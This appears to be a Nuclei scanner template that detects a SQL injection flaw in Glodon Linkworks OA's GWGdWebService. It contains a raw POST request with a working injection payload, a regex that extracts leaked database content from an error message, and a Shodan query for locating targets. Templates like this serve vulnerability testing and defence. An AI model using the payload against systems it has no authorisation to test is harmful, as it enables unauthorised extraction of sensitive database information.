33 lines
1.1 KiB
YAML
33 lines
1.1 KiB
YAML
|
id: glodon-linkworks-sqli
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: Glodon Linkworks GWGdWebService SQL injection
|
||
|
|
author: DhiyaneshDK
|
||
|
|
severity: high
|
||
|
|
description: |
|
||
|
|
There is a SQL injection vulnerability in the GWGdWebService interface of Glodon Linkworks office OA. Sensitive information in the database can be obtained after sending a request package.
|
||
|
|
reference:
|
||
|
|
- https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
||
|
|
metadata:
|
||
|
|
max-request: 1
|
||
|
|
shodan-query: "Services/Identification/login.ashx"
|
||
|
|
verified: true
|
||
|
|
tags: glodon,linkworks,sqli
|
||
|
|
|
||
|
|
http:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
|
||
|
|
employeeCode=1'-1/user--'&EncryptData=1
|
||
|
|
|
||
|
|
extractors:
|
||
|
|
- type: regex
|
||
|
|
part: body
|
||
|
|
group: 1
|
||
|
|
regex:
|
||
|
|
- '在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。'
|